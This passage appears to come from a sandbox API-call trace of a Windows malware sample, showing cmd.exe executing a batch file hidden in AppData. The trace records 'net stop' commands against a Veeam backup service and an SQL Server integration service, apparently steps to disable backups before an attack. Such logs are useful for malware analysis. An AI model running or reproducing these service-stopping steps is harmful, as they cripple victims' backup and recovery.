dwMilliseconds=0xffffffff) returned 0x0 [0201.749] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0201.749] CloseHandle (hObject=0x74) returned 1 [0201.749] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0201.749] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0201.749] GetProcessHeap () returned 0x3e0000 [0201.749] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0201.749] GetEnvironmentStringsW () returned 0x3f8408* [0201.749] GetProcessHeap () returned 0x3e0000 [0201.749] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0201.749] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0201.749] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0201.749] GetProcessHeap () returned 0x3e0000 [0201.750] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0201.750] GetEnvironmentStringsW () returned 0x3f8408* [0201.750] GetProcessHeap () returned 0x3e0000 [0201.750] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0201.750] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0201.750] GetProcessHeap () returned 0x3e0000 [0201.750] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0201.750] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0201.750] _get_osfhandle (_FileHandle=1) returned 0x264 [0201.750] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0201.750] _get_osfhandle (_FileHandle=1) returned 0x264 [0201.750] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0201.750] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0201.750] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0201.751] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0201.751] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0201.751] SetConsoleInputExeNameW () returned 0x1 [0201.751] GetConsoleOutputCP () returned 0x1b5 [0201.751] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0201.751] SetThreadUILanguage (LangId=0x0) returned 0x409 [0201.751] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0201.751] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0201.751] _get_osfhandle (_FileHandle=3) returned 0x74 [0201.751] SetFilePointer (in: hFile=0x74, lDistanceToMove=3310, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xcee [0201.751] GetProcessHeap () returned 0x3e0000 [0201.751] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0201.752] GetProcessHeap () returned 0x3e0000 [0201.752] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0201.752] GetProcessHeap () returned 0x3e0000 [0201.752] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0201.752] GetProcessHeap () returned 0x3e0000 [0201.752] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0201.752] GetProcessHeap () returned 0x3e0000 [0201.752] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0201.752] GetProcessHeap () returned 0x3e0000 [0201.752] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0201.752] GetProcessHeap () returned 0x3e0000 [0201.752] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0201.752] GetProcessHeap () returned 0x3e0000 [0201.752] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0201.752] GetProcessHeap () returned 0x3e0000 [0201.752] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0201.752] GetProcessHeap () returned 0x3e0000 [0201.752] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0201.752] GetProcessHeap () returned 0x3e0000 [0201.752] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3e1290 | out: hHeap=0x3e0000) returned 1 [0201.752] GetProcessHeap () returned 0x3e0000 [0201.752] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0201.752] GetProcessHeap () returned 0x3e0000 [0201.752] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0201.752] _get_osfhandle (_FileHandle=3) returned 0x74 [0201.752] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xcee [0201.752] ReadFile (in: hFile=0x74, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0xbd3, lpOverlapped=0x0) returned 1 [0201.752] SetFilePointer (in: hFile=0x74, lDistanceToMove=3337, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xd09 [0201.752] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=27, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop VeeamMountSvc /y\r\nfeeFramework /y\r\neΓÇ¥ /y\r\nures\r\nnded\r\n") returned 27 [0201.753] _get_osfhandle (_FileHandle=3) returned 0x74 [0201.753] GetFileType (hFile=0x74) returned 0x1 [0201.753] _get_osfhandle (_FileHandle=3) returned 0x74 [0201.753] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xd09 [0201.753] GetProcessHeap () returned 0x3e0000 [0201.753] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fdad8 [0201.753] GetProcessHeap () returned 0x3e0000 [0201.753] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fdad8 | out: hHeap=0x3e0000) returned 1 [0201.756] _tell (_FileHandle=3) returned 3337 [0201.756] _close (_FileHandle=3) returned 0 [0201.756] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0201.756] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0201.756] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0201.756] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0201.756] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0201.756] _wcsicmp (_String1="net", _String2="CD") returned 11 [0201.756] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0201.756] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0201.756] _wcsicmp (_String1="net", _String2="REN") returned -4 [0201.756] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0201.756] _wcsicmp (_String1="net", _String2="SET") returned -5 [0201.756] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0201.756] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0201.757] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0201.757] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0201.757] _wcsicmp (_String1="net", _String2="MD") returned 1 [0201.757] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0201.757] _wcsicmp (_String1="net", _String2="RD") returned -4 [0201.757] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0201.757] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0201.757] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0201.757] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0201.757] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0201.757] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0201.757] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0201.757] _wcsicmp (_String1="net", _String2="VER") returned -8 [0201.757] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0201.757] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0201.757] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0201.757] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0201.757] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0201.757] _wcsicmp (_String1="net", _String2="START") returned -5 [0201.757] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0201.757] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0201.757] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0201.758] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0201.758] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0201.758] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0201.758] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0201.758] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0201.758] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0201.758] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0201.758] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0201.758] SetErrorMode (uMode=0x0) returned 0x1 [0201.758] GetProcessHeap () returned 0x3e0000 [0201.758] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0201.758] GetProcessHeap () returned 0x3e0000 [0201.758] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0201.759] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0201.759] GetProcessHeap () returned 0x3e0000 [0201.759] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0201.759] GetProcessHeap () returned 0x3e0000 [0201.759] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0201.759] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0201.759] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0201.760] GetLastError () returned 0x2 [0201.760] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0201.760] GetLastError () returned 0x2 [0201.760] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0201.761] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0201.761] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0201.761] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0201.761] GetLastError () returned 0x2 [0201.762] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0201.762] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0201.762] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0201.763] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0201.763] SetErrorMode (uMode=0x0) returned 0x1 [0201.763] GetProcessHeap () returned 0x3e0000 [0201.763] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0201.763] GetProcessHeap () returned 0x3e0000 [0201.763] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0201.763] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0201.763] GetProcessHeap () returned 0x3e0000 [0201.763] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0201.763] GetProcessHeap () returned 0x3e0000 [0201.763] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0201.764] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0201.764] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0201.764] GetLastError () returned 0x2 [0201.764] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0201.764] GetLastError () returned 0x2 [0201.765] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0201.765] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0201.765] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0201.766] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0201.766] GetLastError () returned 0x2 [0201.766] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0201.766] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0201.767] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0201.767] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0201.767] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0201.767] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0201.767] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0201.767] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop VeeamMountSvc /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop VeeamMountSvc /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop VeeamMountSvc /y", lpProcessInformation=0x3beae0*(hProcess=0x78, hThread=0x74, dwProcessId=0xa84, dwThreadId=0xa6c)) returned 1 [0201.772] CloseHandle (hObject=0x74) returned 1 [0201.772] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0201.772] GetProcessHeap () returned 0x3e0000 [0201.772] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0201.772] GetEnvironmentStringsW () returned 0x3f8408* [0201.772] GetProcessHeap () returned 0x3e0000 [0201.772] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0201.772] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0201.772] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0201.910] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0201.910] CloseHandle (hObject=0x78) returned 1 [0201.910] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0201.910] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0201.910] GetProcessHeap () returned 0x3e0000 [0201.910] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0201.910] GetEnvironmentStringsW () returned 0x3f8408* [0201.910] GetProcessHeap () returned 0x3e0000 [0201.911] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0201.911] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0201.911] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0201.911] GetProcessHeap () returned 0x3e0000 [0201.911] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0201.911] GetEnvironmentStringsW () returned 0x3f8408* [0201.911] GetProcessHeap () returned 0x3e0000 [0201.911] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0201.911] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0201.911] GetProcessHeap () returned 0x3e0000 [0201.911] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0201.911] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0201.911] _get_osfhandle (_FileHandle=1) returned 0x264 [0201.911] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0201.911] _get_osfhandle (_FileHandle=1) returned 0x264 [0201.911] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0201.912] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0201.912] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0201.912] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0201.912] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0201.912] SetConsoleInputExeNameW () returned 0x1 [0201.912] GetConsoleOutputCP () returned 0x1b5 [0201.912] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0201.912] SetThreadUILanguage (LangId=0x0) returned 0x409 [0201.912] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0201.913] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0201.913] _get_osfhandle (_FileHandle=3) returned 0x78 [0201.913] SetFilePointer (in: hFile=0x78, lDistanceToMove=3337, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xd09 [0201.913] GetProcessHeap () returned 0x3e0000 [0201.913] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0201.913] GetProcessHeap () returned 0x3e0000 [0201.913] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0201.913] GetProcessHeap () returned 0x3e0000 [0201.913] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0201.913] GetProcessHeap () returned 0x3e0000 [0201.913] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0201.913] GetProcessHeap () returned 0x3e0000 [0201.913] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0201.913] GetProcessHeap () returned 0x3e0000 [0201.913] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0201.913] GetProcessHeap () returned 0x3e0000 [0201.913] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0201.913] GetProcessHeap () returned 0x3e0000 [0201.913] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0201.913] GetProcessHeap () returned 0x3e0000 [0201.913] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0201.913] GetProcessHeap () returned 0x3e0000 [0201.913] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0201.913] GetProcessHeap () returned 0x3e0000 [0201.913] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0201.913] GetProcessHeap () returned 0x3e0000 [0201.913] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0201.913] GetProcessHeap () returned 0x3e0000 [0201.913] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0201.914] _get_osfhandle (_FileHandle=3) returned 0x78 [0201.914] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xd09 [0201.914] ReadFile (in: hFile=0x78, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0xbb8, lpOverlapped=0x0) returned 1 [0201.914] SetFilePointer (in: hFile=0x78, lDistanceToMove=3365, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xd25 [0201.914] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=28, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop MsDtsServer110 /y\r\neeFramework /y\r\neΓÇ¥ /y\r\nures\r\nnded\r\n") returned 28 [0201.914] _get_osfhandle (_FileHandle=3) returned 0x78 [0201.914] GetFileType (hFile=0x78) returned 0x1 [0201.914] _get_osfhandle (_FileHandle=3) returned 0x78 [0201.914] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xd25 [0201.914] GetProcessHeap () returned 0x3e0000 [0201.914] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fdad8 [0201.914] GetProcessHeap () returned 0x3e0000 [0201.914] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fdad8 | out: hHeap=0x3e0000) returned 1 [0201.917] _tell (_FileHandle=3) returned 3365 [0201.918] _close (_FileHandle=3) returned 0 [0201.918] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0201.918] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0201.918] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0201.918] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0201.918] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0201.918] _wcsicmp (_String1="net", _String2="CD") returned 11 [0201.918] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0201.918] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0201.918] _wcsicmp (_String1="net", _String2="REN") returned -4 [0201.918] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0201.918] _wcsicmp (_String1="net", _String2="SET") returned -5 [0201.918] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0201.918] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0201.918] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0201.918] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0201.918] _wcsicmp (_String1="net", _String2="MD") returned 1 [0201.918] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0201.918] _wcsicmp (_String1="net", _String2="RD") returned -4 [0201.918] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0201.918] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0201.918] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0201.918] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0201.918] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0201.918] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0201.918] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0201.918] _wcsicmp (_String1="net", _String2="VER") returned -8 [0201.918] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0201.918] _wcsicmp 